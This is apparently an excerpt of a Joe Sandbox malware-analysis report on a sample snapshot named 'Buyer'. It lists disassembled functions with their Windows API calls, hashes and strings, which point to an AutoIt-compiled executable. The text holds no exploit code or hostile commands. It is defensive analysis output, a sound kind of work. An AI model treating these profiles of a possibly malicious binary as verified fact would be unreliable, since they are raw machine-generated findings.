                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                    • API String ID: 1256254125-909552448
                                                                                                    • Opcode ID: fddc758ce3c33f709a5a1ba3406da35f080be37c99821bb6012b0b27a1acf56d
                                                                                                    • Instruction ID: 94204eb926a4e631df9699313b03339ffa54e29d6c4f745f6c741ff0b62bbb5f
                                                                                                    • Opcode Fuzzy Hash: fddc758ce3c33f709a5a1ba3406da35f080be37c99821bb6012b0b27a1acf56d
                                                                                                    • Instruction Fuzzy Hash: 8971E132E005678BDB10AE68CF42FFE3391AF60360F25053DEC559B284EA35DD45E6A1
                                                                                                    Function 00FD8A28 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00FD8A46
                                                                                                    • _wcslen.LIBCMT ref: 00FD8A5A
                                                                                                    • _wcslen.LIBCMT ref: 00FD8A7D
                                                                                                    • _wcslen.LIBCMT ref: 00FD8AA0
                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00FD8ADE
                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00FD63B2), ref: 00FD8B3A
                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FD8B73
                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00FD8BB6
                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FD8BED
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00FD8BF9
                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FD8C09
                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,00FD63B2), ref: 00FD8C18
                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00FD8C35
                                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00FD8C41
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                    • API String ID: 799131459-1154884017
                                                                                                    • Opcode ID: 5c1fc6ea563f5c45902fa595d224238ce27034ca7e97f508630cdad65ba57e01
                                                                                                    • Instruction ID: 11c40b2ae57a2b7bda15ea39f21e97fc5dd24bc14dca47751a5404b895559ce6
                                                                                                    • Opcode Fuzzy Hash: 5c1fc6ea563f5c45902fa595d224238ce27034ca7e97f508630cdad65ba57e01
                                                                                                    • Instruction Fuzzy Hash: 1461F2B1A00619FAEB14DF74CC41BBE7BA9BF08764F148107F815D62D1DB74A981EBA0
                                                                                                    Function 00F435D5 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                    • API String ID: 0-1645009161
                                                                                                    • Opcode ID: 4aee5250bfb8ffb3adc041adc00a0d413d95587aac59d158060f79f6056c90f9
                                                                                                    • Instruction ID: 94cb7c4c54eb4850e022777f3aa35e327f81c16bcf5762b30c7a3123000ee666
                                                                                                    • Opcode Fuzzy Hash: 4aee5250bfb8ffb3adc041adc00a0d413d95587aac59d158060f79f6056c90f9
                                                                                                    • Instruction Fuzzy Hash: F281D872A44206BBDB10AF60CC43FAA3FA9EF05750F154025FD059A2A2EBB8DB45F751
                                                                                                    Function 00FB45E8 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 00FB4667
                                                                                                    • _wcslen.LIBCMT ref: 00FB4672
                                                                                                    • _wcslen.LIBCMT ref: 00FB46C9
                                                                                                    • _wcslen.LIBCMT ref: 00FB4707
                                                                                                    • GetDriveTypeW.KERNEL32(?), ref: 00FB4745
                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FB478D
                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FB47C8
                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FB47F6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                    • API String ID: 1839972693-4113822522
                                                                                                    • Opcode ID: c4f2dfbb60562c579a0a02e5b7d64deed0c0a807482eae925c4ee7bd481e7b53
                                                                                                    • Instruction ID: b80807b25d5978ffd3d9b01978a02d8ca5b93c9b290864dd595610e40c475eb9
                                                                                                    • Opcode Fuzzy Hash: c4f2dfbb60562c579a0a02e5b7d64deed0c0a807482eae925c4ee7bd481e7b53
                                                                                                    • Instruction Fuzzy Hash: D371F332A043018FC300EF25C9809AABBE5EF55764F10492DF89587362EB38ED45DF91
                                                                                                    Function 00FA6114 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadIconW.USER32(00000063), ref: 00FA6127
                                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00FA6139
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00FA6150
                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00FA6165
                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00FA616B
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00FA617B
                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00FA6181
                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00FA61A2
                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00FA61BC
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00FA61C5
                                                                                                    • _wcslen.LIBCMT ref: 00FA622C
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00FA6268
                                                                                                    • GetDesktopWindow.USER32 ref: 00FA626E
                                                                                                    • GetWindowRect.USER32(00000000), ref: 00FA6275
                                                                                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00FA62CC
                                                                                                    • GetClientRect.USER32(?,?), ref: 00FA62D9
                                                                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 00FA62FE
                                                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00FA6328
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 895679908-0
                                                                                                    • Opcode ID: 2f0a203665d4c2b82298dd54b69a3418cfaf2b04b7b9f19048c3b1e0989dfc92
                                                                                                    • Instruction ID: 5064b5179cd7d8ecedef8a371cd00774ab526514c4ba1752dc179c186c916302
                                                                                                    • Opcode Fuzzy Hash: 2f0a203665d4c2b82298dd54b69a3418cfaf2b04b7b9f19048c3b1e0989dfc92
                                                                                                    • Instruction Fuzzy Hash: 8D719B71900709AFDB20DFA8CE45BAEBBF5FF48714F140929E186E22A0D775E940EB50
                                                                                                    Function 00FC0595 Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00FC05AE
                                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00FC05B9
                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00FC05C4
                                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00FC05CF
                                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00FC05DA
                                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00FC05E5
                                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 00FC05F0
                                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00FC05FB
                                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00FC0606
                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00FC0611
                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00FC061C
                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00FC0627
                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00FC0632
                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00FC063D
                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00FC0648
                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00FC0653
                                                                                                    • GetCursorInfo.USER32(?), ref: 00FC0663
                                                                                                    • GetLastError.KERNEL32 ref: 00FC06A5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215588206-0
                                                                                                    • Opcode ID: 04f7e3e90a7e5d88e27e58411951f55c72f870b86e29a4284539280cdcdaf723
                                                                                                    • Instruction ID: e9583113f1de8f7fe3d172852cea971e54088b9cdd7849787c032f385ccfc0ad
                                                                                                    • Opcode Fuzzy Hash: 04f7e3e90a7e5d88e27e58411951f55c72f870b86e29a4284539280cdcdaf723
                                                                                                    • Instruction Fuzzy Hash: 384174B0D0831AAADB109FBA8C85D5EBFE8FF44364B50452AE11DE7281DA78D8019F91
                                                                                                    Function 00F60416 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00F60416
                                                                                                      • Part of subcall function 00F6043D: InitializeCriticalSectionAndSpinCount.KERNEL32(010116FC,00000FA0,6041021D,?,?,?,?,00F82703,000000FF), ref: 00F6046C
                                                                                                      • Part of subcall function 00F6043D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00F82703,000000FF), ref: 00F60477
                                                                                                      • Part of subcall function 00F6043D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00F82703,000000FF), ref: 00F60488
                                                                                                      • Part of subcall function 00F6043D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00F6049E
                                                                                                      • Part of subcall function 00F6043D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00F604AC
                                                                                                      • Part of subcall function 00F6043D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00F604BA
                                                                                                      • Part of subcall function 00F6043D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F604E5
                                                                                                      • Part of subcall function 00F6043D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F604F0
                                                                                                    • ___scrt_fastfail.LIBCMT ref: 00F60437
                                                                                                      • Part of subcall function 00F603F3: __onexit.LIBCMT ref: 00F603F9
                                                                                                    Strings
                                                                                                    • WakeAllConditionVariable, xrefs: 00F604B2
                                                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00F60472
                                                                                                    • SleepConditionVariableCS, xrefs: 00F604A4
                                                                                                    • InitializeConditionVariable, xrefs: 00F60498
                                                                                                    • kernel32.dll, xrefs: 00F60483
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                    • API String ID: 66158676-1714406822
                                                                                                    • Opcode ID: c6c6988876176c06cba0717257b3583cf9f0664f239a2baee169e06c3a2a1abd
                                                                                                    • Instruction ID: 3d261b8ba3cd6d001d2eea930cddaef86a4af977b033be3ad24d13178376221d
                                                                                                    • Opcode Fuzzy Hash: c6c6988876176c06cba0717257b3583cf9f0664f239a2baee169e06c3a2a1abd
                                                                                                    • Instruction Fuzzy Hash: BF213832A813056BD7356BB5AC46B6B37A5EB05F61F24012AFA01D7280DFB8DC40BB61
                                                                                                    Function 00FA37D8 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                    • API String ID: 176396367-1603158881
                                                                                                    • Opcode ID: 343de06787dece0ed1f1c0047bd76491568768dd8f0dfb38927648cb9638f7ce
                                                                                                    • Instruction ID: 3d9fd606eb3fa5afb5ca35973b5fca6a3eb7022f9db9611bc5a119480033f250
                                                                                                    • Opcode Fuzzy Hash: 343de06787dece0ed1f1c0047bd76491568768dd8f0dfb38927648cb9638f7ce
                                                                                                    • Instruction Fuzzy Hash: 14E1E772E005269BCB18DF64C881BEEFBB5BF46760F104119F856F7250DB34AE85A7A0
                                                                                                    Function 00FB4C2F Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CharLowerBuffW.USER32(00000000,00000000,00FDDC1C), ref: 00FB4C96
                                                                                                    • _wcslen.LIBCMT ref: 00FB4CAA
                                                                                                    • _wcslen.LIBCMT ref: 00FB4D08
                                                                                                    • _wcslen.LIBCMT ref: 00FB4D63
                                                                                                    • _wcslen.LIBCMT ref: 00FB4DAE
                                                                                                    • _wcslen.LIBCMT ref: 00FB4E16
                                                                                                      • Part of subcall function 00F5FD18: _wcslen.LIBCMT ref: 00F5FD23
                                                                                                    • GetDriveTypeW.KERNEL32(?,01007C00,00000061), ref: 00FB4EB2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                    • API String ID: 2055661098-1000479233
                                                                                                    • Opcode ID: 265e5559f96899af8a5c8efc3984e20aeadb06c9d5b46fbe5f7e6d8d5e82eb83
                                                                                                    • Instruction ID: 5bdd5bb64ec0451fcfda16782cb408f2794522d549ac8fafe477952de65c7295
                                                                                                    • Opcode Fuzzy Hash: 265e5559f96899af8a5c8efc3984e20aeadb06c9d5b46fbe5f7e6d8d5e82eb83
                                                                                                    • Instruction Fuzzy Hash: 4AB1D331A083129FC710EF29CA90ABAB7E5BF94720F50491DF596C7292D734E845EF92
                                                                                                    Function 00FCB780 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00FCB91F
                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00FCB937
                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00FCB95B
                                                                                                    • _wcslen.LIBCMT ref: 00FCB987
                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00FCB99B
                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00FCB9BD
                                                                                                    • _wcslen.LIBCMT ref: 00FCBAB9
                                                                                                      • Part of subcall function 00FB0C78: GetStdHandle.KERNEL32(000000F6), ref: 00FB0C97
                                                                                                    • _wcslen.LIBCMT ref: 00FCBAD2
                                                                                                    • _wcslen.LIBCMT ref: 00FCBAED
                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FCBB3D
                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00FCBB8E
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00FCBBC0
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00FCBBD1
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00FCBBE3
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00FCBBF5
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00FCBC6A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 2178637699-0
                                                                                                    • Opcode ID: 292baaeb4cb71a8749fbe6cb4523610cb0c1c1d95bc1b6ac70937639c50e6ab9
                                                                                                    • Instruction ID: 31f068e922d3a068207475cf278956f9601fc9a09ce71dc1e3909024a4c73cc6
                                                                                                    • Opcode Fuzzy Hash: 292baaeb4cb71a8749fbe6cb4523610cb0c1c1d95bc1b6ac70937639c50e6ab9
                                                                                                    • Instruction Fuzzy Hash: 21F1C0359043419FCB14EF24C992F6ABBE5BF85320F18855DF8854B2A2CB35EC41EB52
                                                                                                    Function 00FC4770 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00FDDC1C), ref: 00FC4842
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00FC4854
                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00FDDC1C), ref: 00FC4879
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00FDDC1C), ref: 00FC48C5
                                                                                                    • StringFromGUID2.OLE32(?,?,00000028,?,00FDDC1C), ref: 00FC492F
                                                                                                    • SysFreeString.OLEAUT32(00000009), ref: 00FC49E9
                                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00FC4A4F
                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00FC4A79
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                    • API String ID: 354098117-199464113
                                                                                                    • Opcode ID: 3032024ca82bddfef307470b244c8c4e1a01c8dc0cf2fda51b816c0d4d627402
                                                                                                    • Instruction ID: 0d625fbd0f0c8bc6bcf1c0639c89222faa023545c1cf092daa7a936278115ae8
                                                                                                    • Opcode Fuzzy Hash: 3032024ca82bddfef307470b244c8c4e1a01c8dc0cf2fda51b816c0d4d627402
                                                                                                    • Instruction Fuzzy Hash: 34124A71A0020AAFDB14DF94C995FAEBBB5FF85314F14809CE8059B261D731ED46EBA0
                                                                                                    Function 00F430A2 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetMenuItemCount.USER32(010129B0), ref: 00F83202
                                                                                                    • GetMenuItemCount.USER32(010129B0), ref: 00F832B2
                                                                                                    • GetCursorPos.USER32(?), ref: 00F832F6
                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00F832FF
                                                                                                    • TrackPopupMenuEx.USER32(010129B0,00000000,?,00000000,00000000,00000000), ref: 00F83312
                                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F8331E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 36266755-4108050209
                                                                                                    • Opcode ID: d7ca250b6a46d612d9c96a00d823e3b7fcb83f31794e37840f4be1fdc8a4f765
                                                                                                    • Instruction ID: 0aa6c915ab87e574f3b821b347ea1dd6598c31df0eb94773372c003907e73d64
